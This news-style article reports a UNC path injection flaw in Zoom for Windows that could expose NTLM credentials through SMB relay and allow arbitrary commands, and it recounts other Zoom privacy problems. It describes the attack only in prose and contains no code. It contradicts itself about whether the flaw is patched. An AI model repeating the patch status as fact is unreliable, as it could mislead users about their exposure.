Zoom App has amassed massive popularity in a time when people need a means to socially connect with each other. However, Zoom has again fount itself in another allegation on privacy issues.
Hacker News reported yesterday that the Zoom app has an unpatched bug that has left the users’ window credentials vulnerable before the attackers.
Hacker News Report (Zoom App)
The organization reported that the Zoom software for Windows is vulnerable to ‘UNC path injection’. It was reported by cybersecurity expert @_g0dmode.
Due to this vulnerability, one could steal your Windows login credentials and can also execute arbitrary commands on your system.
Such a privacy attack involves the SMB Relay technique. In simple words, the attacker exploits the fact that Windows exposes a user’s login username and NTLM password hashes to a remote SMB server while connecting and downloading a file hosted on it. Researcher Matthew Hickey confirms this theory.
Zoom is vulnerable to these attacks because it supports remote UNC paths. These paths convert potentially insecure URIs into hyperlinks when received via chat messages to a recipient in a personal or group chat.
A day after the report was published, Zoom apologized for falling short of privacy and security expectations and released an updated version to patch recently reported multiple security issues, including UNC path injection.
How Will It Harm You?
This bug would allow the attacker to capture authentication data from your Windows, without your knowledge.
Also, the attacker can launch any program already present or execute arbitrary commands on your computer. Google security researcher Tavis Ormandy confirmed this.
Also, another security researcher named ‘pwnsdx‘ on Twitter told The Hacker News that attackers could also hide malicious links when displayed at the recipients’ end, potentially making it look more convincing and practical.
What Should You Do?
Zoom has already been notified of this bug, but the flaw has not yet been patched.
Hacker news advised using an alternative video conferencing software in its report. The alternatives include Skype & Microsoft Teams, Google Hangouts, and FaceTime.
Also, you could use Zoom in the web browsers instead of installing a dedicated client app on your systems.
History Of Privacy Issues Of Zoom
FBI has warned users about the “Zoom-Bombing” attack. In this attackers sneak into a random meeting or gathering and bombarded them with pornographic images or racist comments.
Yesterday, a report confirmed that Zoom doesn’t use end-to-end encryption to protect calling data of its users even though it says it does. You can learn more about this news here.
Last week, Zoom updated its iOS app. It was, reportedly, sharing users’ information to the third party, including FB without the discrete knowledge of users.